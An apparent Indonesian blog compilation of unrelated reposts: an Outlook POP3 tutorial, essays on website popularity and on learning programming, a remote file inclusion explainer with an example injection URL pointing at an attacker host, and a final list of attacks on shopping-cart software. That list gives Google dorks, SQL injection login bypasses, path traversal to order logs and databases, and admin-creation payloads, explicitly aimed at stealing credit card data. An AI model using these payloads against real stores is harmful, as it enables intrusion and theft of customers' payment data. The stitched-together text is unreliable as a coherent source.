Pada komputer tempat Anda ingin membaca e-mail, tapi tidak menyimpan mereka secara permanen, lakukan langkah berikut. Pada menu Tools, klik Account Settings. Di bawah Name, pilih POP3 e-mail account yang ingin Anda ubah, dan kemudian klik Change. Klik More Settings. Klik tab Advanced, dan kemudian di bawah Delivery, beri tanda centang ([1]) Leave a copy of messages on the server.
2 AMBIL E-MAIL (1)
Untuk mengambil e-mail secara manual, pada menu Tools, pilih Send/Receive, pilih POP3 e-mail account Anda, dan kemudian klik Inbox. Untuk mengambil e-mail secara otomatis, pada menu Tools, pilih Send/Receive, pilih Send/Receive Settings, dan kemudian Define Send/Receive Groups. Di bawah Group Name, pilih grup POP3 e-mail account Anda, dan kemudian di bawah Setting for group “name”, beri tanda centang ([1]) Schedule an automatic send/receive n minutes.
3 AMBIL E-MAIL (2)
Masukkan angka antara 1 dan 1440. Angka terakhir akan otomatis melakukan send/receive satu kali sehari. (Jika Anda belum membuat grup Send/Receive, pilih grup All Accounts. POP3 e-mail server Anda dicek dan e-mail baru akan di-download sesuai dengan jadwal yang Anda buat. Perlu diingat bahwa kebanyakan ISP membatasi ukuran POP3 mailbox Anda. Jika tidak menghapus item dari server, account Anda nanti akan melebihi batas yang ditentukan oleh ISP sehingga Anda tidak bisa menerima e-mail.
4 BUAT POP3 ACCOUNT
Pada komputer tempat Anda ingin menyimpan e-mail, kita akan konfi gurasi Outlook untuk men-download e-mail dan menghapus mereka dari mail server. Setelah Anda menggunakan komputer ini untuk mengecek e-mail, komputer lain tidak bisa lagi men-download e-mail tersebut. Jika Anda belum membuat POP3 account, lakukan sekarang. Pada menu Tools, klik Account Settings. Pada tab E-mail, klik New, pilih Microsoft Exchange, POP3, IMAP, or HTTP, dan kemudian klik Next. Masukkan nama, alamat e-mail, dan password pada boks yang sesuai.
5 AMBIL E-MAIL - HOME (1)
Untuk mengambil e-mail secara manual, pada menu Tools, pilih Send/Receive, pilih POP3 e-mail account, dan kemudian klik Inbox. Untuk mengambil e-mail secara otomatis, pada menu Tools, pilih Send/Receive, pilih Send/Receive Settings, dan kemudian Defi ne Send/Receive Groups. Di bawah Group Name, pilih grup POP3 e-mail account Anda, dan kemudian di bawah Setting for group “name”, beri tanda centang ([1]) Schedule an automatic send/receive n minutes.
6 AMBIL E-MAIL – HOME (2)
Masukkan angka antara 1 dan 1440. Angka terakhir akan otomatis melakukan send/receive satu kali sehari. (Jika Anda belum membuat grup Send/Receive, pilih grup All Accounts. POP3 e-mail server Anda dicek dan e-mail baru akan di-download sesuai dengan jadwal yang Anda buat. Perlu di-ingat bahwa kebanyakan ISP membatasi ukuran POP3 mailbox Anda. Jika tidak menghapus item dari server, account Anda nanti akan melebihi batas yang ditentukan oleh ISP sehingga Anda tidak bisa menerima e-mail.
MENYIMPAN E-MAIL SEMENTARA
Cara alternatif untuk membaca POP3 e-mail pada beberapa komputer adalah dengan men-download salinan e-mail dan membiarkan mereka di POP3 server. Pada waktu Anda mencentang ([1]) Leave a copy of messges on the server (menu Tools, Account Settings, Name, POP3 e-mail account Anda, Change, More Settings, tab Advanced), centang ([1]) juga Remove from server after n days. Ini memungkinkan Anda untuk membaca e-mail pada beberapa komputer selama jangka waktu yang ditentukan. Mail dihapus dari POP3 server setelah batas waktu terlewat.
Thanks For PCMILD
salam
azer
Mungkin belum ada cara yang benar-benar akurat untuk menghitung berapa jumlah situs aktif di Internet, tetapi tanpa menggunakan tools atau survai, kita sudah dapat melihat dengan kasat mata bahwa jumlah situs yang bertebaran di Internet bertambah relatif pesat dari hari ke hari, yang tidak akan ada habis-habisnya Anda kunjungi walaupun Anda berselancar di dunia maya selama 7x24 jam non-stop. Tetapi di sisi lain, menemukan situs baru yang inovatif jarang-jarang ditemui, kebanyakan situs baru dibuat dengan mengambil ide dari situs yang pernah ada sebelumnya. Hasilnya, kita dapat melihat betapa banyak bertebaran situs blog, portal, wiki, game, berita, dan sederet klasifi kasi lainnya.
Karena itu, jika Anda memiliki ide brilian dan meluncurkan sebuah situs yang tidak pernah terpikirkan oleh orang lain, maka Anda harus menabahkan hati jika nantinya situs Anda memiliki kembaran, secara disengaja maupun tidak. Situs A mirip seperti situs B, situs B mirip seperti situs C, sebenarnya bukan menjadi hal yang tabu di Internet mengingat sedemikian banyak pengguna Internet yang tersebar di seluruh dunia dan luasnya kreativitas yang dapat dikembangkan pada sebuah situs, sehingga justru semakin memperluas informasi yang dapat diakses pengguna.
Walaupun mungkin ada saja plagiator yang mencontek secara total ide, desain, atau bahkan konten situs tertentu. Tetapi seiring waktu berjalan, situs tiruan pun harus menemukan jati diri sendiri untuk dapat tetap bertahan dalam rimba informasi bernama Internet.
Dari sekian banyak situs yang bebas diakses oleh siapapun, baik yang menawarkan kreasi baru ataupun menjadi follower, ada satu persamaan yang dimiliki, yaitu semua situs tersebut ingin menjadi popular. World wide web bagaikan etalase rak-sasa yang memajang jutaan situs yang berlomba-lomba ingin menjadi yang terdepan.
Mengukur Popularitas
“Tolong buatkan saya situs yang jika di cari pada search engine akan tampil pada daftar 10 teratas”, demikian permintaan seorang juragan kambing yang tidak ketinggalan ingin mempopularkan bisnisnya di Internet.
Biasanya web developer akan mati-matian menjelaskan betapa sulitnya mengharapkan sebuah situs tampil terdepan pada search engine, dan akhirnya mengeluarkan istilah-istilah sakti, seperti search engine optimization, search algorithm, meta tag, keyword, web crawler, dan sebagainya, dengan harapan sang juragan kambing memaklumi jika situsnya nanti tidak sepopular harapannya.
Sebenarnya Anda cukup mengatakan terdapat sekitar 250.000 halaman baru yang bertambah setiap harinya di Internet dan silakan membayangkan jika semuanya ingin tampil teratas pada search engine.
Jangan lupa mengatakan berita baiknya, yaitu terdapat lebih dari 1 milyar pengguna Internet di seluruh dunia, dan angka tersebut bertambah setiap harinya. Jadi walaupun sebuah situs tidak menempati peringkat atas pada search engine, bukan berarti situs tersebut tidak popular.
Lalu, bagaimana mengukur popularitas sebuah situs? Salah satu yang sering menjadi acuan adalah melihat dari frekuensi kunjungan pengguna. Terdapat beberapa cara yang akan kita bahas di bawah ini.
Web Counter
Sebuah web counter (lazim juga disebut hit counter) akan menghitung jumlah pengunjung yang mengakses situs Anda, web counter biasanya diletakkan pada halaman depan situsdan mungkin saja ingin ditunjukkan oleh pemilik situs denganfont ukuran besar jika jumlahnya fantastis, dan sebaliknya angkadengan font ukuran kecil jika jumlahnya minim (tergantungpada tingkat percaya diri sang pemilik situs!).
Bagi web desainer/developer yang tidak ingin repot melakukan pemrograman web counter, terdapat cukup banyak situs yang menawarkan jasa gratis perhitungan web counter. Cukupdengan menambahkan sederet kode program pada halamansitus Anda, dan akan tampil jumlah visitor yang mengakses situs Anda.
Sayangnya, web counter tidak selalu dapat dipercaya, selama angka pada web counter dapat dimodifikasi oleh pemilik situs. Saat ini web counter nyaris tidak menimbulkan kesan berarti bagi yang melihatnya, bisa jadi karena sudah terlalu umum, atau karena kurangnya kepercayaan pada angka yang tertera pada web counter.
Walaupun demikian, tidak tertutup kemungkinan Anda membuat web counter menjadi lebih menarik dengan sedikit kreativitas, misalnya dengan menampilkan jumlah pengguna yang sedang mengakses situs Anda, atau menampilkan web counter yang bergerak secara live. Salah satu contoh seperti yang ditawarkan pada situs http://www.chami.com/counter/classic/.
Statistik Web
Statistik web umumnya memberikan informasi yang lebih baik dibandingkan angka yang ditunjukkan pada web counter. Contohnya, Anda dapat melihat banyaknya kunjungan berdasarkan periode tertentu, atau dibagi sesuai letak geografis, atau menunjukkan berapa data transfer yang terpakai, dan informasi lainnya.
Pada statistik web, Anda tidak hanya dapat melihat dalam bentuk angka, tetapi juga dalam bentuk table dan grafik. Informasi seperti ini sangat berguna untuk menganalisis kunjungan situs secara lebih detail.
Statistik web mengambil data mentah yang berasal dari semua request yang ditujukan ke situs Anda (termasuk juga request yang gagal), request tersebut disimpan ke dalam sebuah log file pada web server. Log ini kemudian diproses oleh aplikasi web analytics dan ditampilkan menjadi laporan statistik web yang informatif.
Cara di atas tentunya memerlukan hak akses terhadap log file pada web server. Bagaimana jika kita ingin menghitung statistic sebuah situs tetapi tidak memiliki akses pada log file di web server? Caranya adalah dengan menggunakan JavaScript yang memberitahukan server third-party setiap kali sebuah halaman situs dipanggil oleh web browser, metode ini dikenal dengan nama page tagging.
Menampilkan statistik web dengan metode membaca log file ataupun page tagging memiliki kelebihan dan kekurangan masing-masing. Juga dimungkinkan untuk menggunakan metode hybrid yang menggabungkan kedua metode di atas dengan harapan dapat memberikan informasi statistik yang lebih akurat.
Beberapa contoh aplikasi web analytics adalah AWStats, W3Perl, Webalizer, phpMyVisites, dan sebagainya.
Web Rank
Daftar peringkat/ranking selalu digemari karena mudah dipahami dan langsung mengena pada sasaran. Adalah sesuatu yang memiliki daya tarik tersendiri jika menampilkan daftar seperti: orang-orang terkaya di dunia, film-film terbaik pemenang oscar, dan seterusnya. Bagaimana dengan daftar web terpopular?
Salah satu penyedia informasi tersebut adalah Alexa Internet, Inc (http://www.alexa.com). Sebuah perusahaan subsidiary dari Amazon.com. Peringkat pada alexa diambil berdasarkan kunjungan pengguna Alexa Toolbar untuk Internet Explorer dan sidebar terintegrasi di dalam Mozilla dan Netscape.
Walaupun terdapat kontroversi mengenai akurasi informasi yang ditampilkan Alexa, tetapi informasi yang ditampilkan cukup baik digunakan sebagai acuan popularitas sebuah situs secara umum.
Tentunya situs yang termasuk dalam daftar 500 besar alexa. com merupakan situs yang sudah tidak diragukan lagi popu-laritasnya. Sebaliknya jika situs Anda masih dalam peringkat yang kurang baik menurut Alexa, maka mungkin hal tersebut merupakan indikasi bahwa Anda harus memperbaiki layanan situs atau memperkenalkan situs Anda lebih luas lagi. Anda dapat melihat informasi peringkat situs tertentu dengan mengetikkan alamat situs yang ingin dicari melalui situs alexa.com ataupun dengan cara menginstal Alexa Toolbar, atau menggunakan extension SearchStatus untuk Mozilla Firefox.
Metode lain diperkenalkan oleh Google dengan PageRank. PageRank mengukur bobot suatu situs dari skala 0–10 dengan algoritma tertentu berdasarkan analisis terhadap link, yang akhirnya menunjukkan seberapa tinggi tingkat kepentingan (importance) suatu situs.
Semakin tinggi nilai PageRank Anda, maka semakin berbobot situs Anda, dan tentunya juga berarti semakin popular. Karena perhitungan PageRank berdasarkan link, maka timbul usaha-usaha memperbanyak link dengan tools dan programiklan text-link. Hal ini kemudian menyebabkan akurasi kualitas situs yang memiliki PageRank tinggi dipertanyakan, karena itu Google secara aktif mulai memberikan penalti bagi situs yang menjual text-link untuk mempertahankan akurasi penilaian PageRank. PageRank dapat ditampilkan melalui Google Toolbar atau extension SearchStatus pada browser Mozilla Firefox.
Popularkan Situs Anda!
Memang menyenangkan jika situs Anda menempati peringkat yang tinggi dan memiliki statistik yang baik, tetapi bagaimana cara mempopularkan situs Anda?
Sebelum Anda meneruskan membaca bagian ini, sebelumnya perlu selalu kita sadari bahwa untuk mendapatkan hasil yang baik, biasanya tidak atau jarang sekali dapat dicapai secara instan dan tanpa usaha maksimal.
Demikian juga dengan popularitas situs Anda, yang merupakan suatu proses yang harus dibangun dengan sungguh-sungguh. Beberapa caranya adalah:
1. Buat hubungan timbal-balik yang saling menguntungkan dengan bertukar link pada situs lain.
2. Terjun ke komunitas seperti forum, blog, mailing list, dan perkenalkan situs Anda dengan cara yang sopan dan tidak melanggar etika komunitas di mana Anda berada. Bahkan kadang cukup menaruh link pada footer (jika diizinkan), Anda mungkin akan mendapatkan beberapa pengunjung baru.
3. Tekankan pada kualitas dan bukan pada kuantitas. Lebih baik mendapatkan 10 pengunjung situs yang menghabiskan waktu rata-rata di atas 30 menit berada dalam situs Anda, dibandingkan 100 pengunjung yang rata-rata hanya membuka situs Anda dalam hitungan detik! Karena itu terus kembangkan situs Anda, pelajari apa yang diinginkan oleh pengunjung dan apa yang perlu diperbaiki jika ada. Anggap pengunjung adalah customer, dan customer adalah raja!
4. Masukkan situs Anda pada direktori online (entah yang gratis ataupun bayar) seperti yellow pages, situs alumni Anda, dan lain-lain yang memiliki kategorisasi dan struktur yang baik.
5. Buat artikel ataupun karya tulis lainnya, tambahkan link menuju situs Anda di dalam artikel tersebut, dan publikasikan artikel tersebut sesuai pada tempatnya. Bayangkan jika artikel Anda menarik para pembacanya, tentunya tidak sedikit yang akan penasaran membuka link situs Anda dengan harapan menemukan informasi lebih lanjut.
Sangat tidak disarankan Anda melakukan spam dengan bomb e-mail, program robot, atau dalam bentuk apapun yang mengganggu kenyamanan orang lain hanya untuk mengejar popularitas.
Memang bagi sebuah situs, popularitas juga dapat berarti uang mengalir lebih lancar. Dengan bekal statistik pengunjung yang tinggi, sebuah situs dapat menyediakan layanan pemasangan iklan dengan biaya relatif cukup mahal. Tetapi sebelum tergiur oleh popularitas dan uang, kita perlu belajar dari situs-situs yang telah populer dan mampu bertahan lama, sekali lagi, mereka selalu membangun kualitas terlebih dahulu sebelum mendapatkan kuantitas. Semuanya kembali pada tujuan sebenarnya situs. Situs diperuntukkan agar orang lain dapat memetik manfaat, maka pengunjung merupakan juri yang sebenarnya untuk menentukan kualitas situs Anda.
Dalam jangka panjang, para pengunjung setia yang mendapatkan manfaat dari situs Andalah yang akan terus membuat situs Anda bertahan.
Batasi Kopi untuk Tamu
Situs bagaikan sebuah rumah yang terbuka bagi para tamu yang datang berkunjung. Tapi, jangan sampai Anda hanya memprioritaskan diri pada tingginya angka pengunjung, tanpa melakukan analisis lebih lanjut mengenai siapakah yang mengunjungi situs Anda. Hal ini dikarenakan tidak semua pengunjung mendatangi situs Anda untuk memperoleh sesuatu yang bermanfaat dari konten situs, di antara sekian banyak pengunjung, bisa jadi pengunjung situs Anda yang paling rajin adalah sebuah software aplikasi yang berjalan secara otomatis!
Aplikasi tersebut dikenal dengan nama Internet bots atau disingkat bots, yang dibuat dengan berbagai tujuan. Ada yang positif seperti robot search engine yang membantu mendaftarkan situs Anda ke dalam search engine, tetapi juga ada yang negatif dan dibuat untuk kepentingan tertentu, misalnya untuk mengumpulkan alamat e-mail pada setiap halaman web yang ditemui, bahkan bisa jadi untuk melakukan penyerangan Denial of Service, tentunya “tamu” yang datang dengan cara seperti ini tidak perlu diberikan secangkir kopi!
Pada akhirnya, realita yang terjadi adalah situs Anda akan popular jika kontennya memang mampu menarik banyak orang, sehingga membuat para pengunjung selalu ingin mengakses situs Anda secara berkala dan kontinyu. Jadi prioritaskan bagaimana untuk dapat menghasilkan situs yang baik dibandingkan mengejar angka pengunjung semata.
Tetapi juga, bukan berarti angka dan statistik pengunjung menjadi tidak penting, gunakan statistik dan counter untuk analisa lebih lanjut dalam mengembangkan situs Anda ke arah yang lebih baik lagi.
Bagaimana caranya menjadi seorang programmer komputer? Apa saja yang perlu dipelajari untuk bisa memprogram komputer? Ini juga termasuk pertanyaan yang tidak jarang diajukan oleh pengunjung situs ini. Tentu saja, yang mengajukan pertanyaan semacam ini adalah mereka yang bukan berlatar belakang informatika. Kemampuan pemrograman komputer saat ini memang bukan monopoli mahasiswa maupun sarjana informatika saja. Selain bisa dipelajari secara otodidak, beberapa jurusan non-informatika di perguruan tinggi juga memasukkan dasar-dasar pemrograman komputer dalam kurikulum mereka.
Mempelajari pemrograman komputer sebaiknya dimulai dari mempelajari bahasa pemrograman yang relatif sederhana terlebih dahulu. Bahasa Pascal/Turbo Pascal maupun C/C++ merupakan alternatif yang baik untuk memulai. Di kebanyakan perguruan tinggi, Pascal merupakan bahasa pemrograman pertama yang diajarkan kepada mahasiswa jurusan informatika. Ini karena Pascal merupakan bahasa pemrograman yang sangat terstruktur sehingga memungkinkan mahasiswa untuk belajar mengasah logika pemrograman. Sementara itu, di perguruan tinggi yang lebih maju, semacam ITB atau UI, para mahaiswa semester awal akan langsung dikenalkan dengan bahasa C dengan pertimbangan bahwa penggunaannya lebih luas ketimbang Pascal sehingga lebih aplikatif. Bagi yang belajar pemrograman secara otodidak, saya sarankan untuk mulai dari Pascal dahulu, dan berikutnya barulah mempelajari C.
Saya tidak akan menyarankan untuk mempelajari beberapa bahasa pemrograman sekaligus secara simultan. Hal ini hanya akan membuat bingung sehingga malahan akan memperlambat proses belajar. Saya cenderung menyarankan untuk mempelajari dan menguasai secara sungguh-sungguh pada satu bahasa pemrograman tertentu. Sekali kita menguasai sebuah bahasa pemrograman, tidak sulit untuk mempelajari bahasa pemrograman lain. Pada pokoknya, setiap bahasa pemrograman hanya memiliki perbedaan pada sintaks dan cara-cara pendeklarasian variabel, konstanta, maupun hal-hal khusus semacam array, pointer, atau linked list (perkecualian ada pada bahasa assembly atau bahasa dengan struktur 'nyeleneh' semacam Prolog). Itulah sebabnya bagi mereka yang sudah akrab dengan pemrograman komputer, tidak akan terlalu kesulitan untuk mempelajari bahasa pemrograman baru.
Mirip seperti kegiatan hacking, pemrograman komputer lebih banyak mengandung unsur seni ketimbang teknis. Mempelajari 'seni' pemrograman merupakan hal yang tidak kalah pentingnya selain mempelajari bahasa pemrograman itu sendiri. Subjek-subjek semacam teknik flowchart, struktur data, maupun logika dan algoritma pemrograman adalah hal yang perlu dipelajari untuk memahami 'seni' memprogram komputer. Juga jangan lupa untuk mempelajari teknik-teknik pemrograman semacam OOP (Object Oriented Programming, Pemrograman berorientasi objek). Semua itu akan sangat berguna dalam kegiatan pemrograman yang sesungguhnya, terutama untuk membuat aplikasi-aplikasi yang kompleks.
Beberapa bahasa pemrograman didesain untuk keperluan khusus. Bahasa assembly perlu dipelajari apabila kita ingin menjadi programmer sistem yang banyak melakukan akses pada hardware. Sebaliknya, beberapa bahasa pemrograman didesain untuk mengembangkan aplikasi yang spesifik. Bahasa Cobol misalnya, lebih banyak digunakan untuk aplikasi bisnis sementara Prolog biasanya dipakai untuk menciptakan software yang memiliki kemampuan expert system/sistem pakar (semacam teknik kecerdasan buatan). Tidak perlu kemaruk mempelajari semuanya. Cukup pelajari bahasa pemrograman yang sekiranya dibutuhkan saja.
Untuk ukuran saat ini, bahasa pemrograman visual dibawah lingkungan Windows seperti Visual Basic atau Delphi merupakan bahasa pemrograman 'favorit' para developer Untuk mereka yang berkecimpung dalam pemrograman database, penguasaan terhadap SQL dan variannya (MS SQL, MySQL maupun PosgreSQL) merupakan nilai tambah. Sementara itu, penguasaan bahasa C merupakan keharusan bagi para programmer yang berkutat dengan OS Linux maupun pengembang software yang sifatnya lintas platform.
Terakhir, komputer dan pemrogramannya adalah dunia yang terus berkembang secara dinamis. Jangan berpuas diri dengan kemampuan yang dimiliki saat ini. Bahasa dan teknik pemrograman baru terus bermunculan dari waktu ke waktu. Seorang programmer sejati tidak pernah berhenti belajar dan mengasah kemampuannya.
Thanks For Jogjahacking.org
Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.
Dalam artikel ini kita akan lebih banyak membahas bagaimana proses file inclusion (yang selanjutnya kita sebut dengan istilah ‘injeksi’) bisa terjadi dalam bahasa PHP.
° BAGAIMANA BISA TERJADI?
———————–
Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:
1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)
Variabel dalam PHP mempunyai sintaks:
#1 include ($namavariable. “/file…”)
#2 require_once ($namavariable. /file…)
#3 include_once ($variable. /file…)
Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel seperti ini:
…
include($my_ms[”root”].’/error.php’);
…
Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit script injeksi PHP:
http://www.target.com/[Script Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?
Diatas adalah contoh eksploitasi MySpeach < = v3.0.2 (my_ms[root])
2. Setting dalam file PHP.ini
#1. register_globals=On
#2. magic_quotes=off
#3. allow_fopenurl=on
° BERBAHAYAKAH?
-------------
File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.
Secara garis besar resiko serangan ini adalah:
1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information, credit cards, etc..)
5. Dan banyak lagi...!!! Termasuk tindakan pengambilalihan server dan ddos!
° SISTEM OPERASI APA YANG KEBAL?
------------------------------
Saya teringat permainan C&C Generals (my fave game!) saat seorang hacker keluar dari barak. Mereka mengucapkan "NO SYSTEMS IS SAFE!". Tepat sekali! Tidak ada sistem operasi yang aman dari serangan injeksi selama mereka menggunakan server side scripting yang dapat dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX, FreeBSD, Solaris, Darwin OS, dan lain-lainnya.
° APA YANG HARUS DILAKUKAN?
-------------------------
Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.
Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal. Gunakan firewall guna mencegah penyusupan orang-orang yang tidak bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.
Thanks for Jogjahacking.org
1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik google.com :--> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : 'or'1
pass : 'or'1
2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan --> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log
3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan --> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb
4. contoh bugs pada bentuk toko sistem :DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan --> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt
5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan --> /admin/
dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)
6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik --> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan -->
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya -->
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order...
7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google: Ketik --> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan --> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/.../cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)
8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com: Ketik --> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan --> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik --> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian
shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%...,
fldpassword%20from%20tbluser%20where%20fldusername=
'admin'%20and%20fldpassword%20like%20'a%25'--
Gantilah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
Kalau berhasil, kita akan mendapatkan informasi username dan password
admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp
11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com Ketik --> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan --> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb
12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik --> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan --> ...&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template...
13. contoh bugs pada bentuk toko sistem :Proddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik --> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan --> fpdb/
vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb
14. contoh bugs pada bentuk toko sistem :Digishop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google Ketik --> inurl:"/cart.php?m="
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan -->admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection
Usename : 'or"="
Password : 'or"="
Thanks For Jogjahacking.org
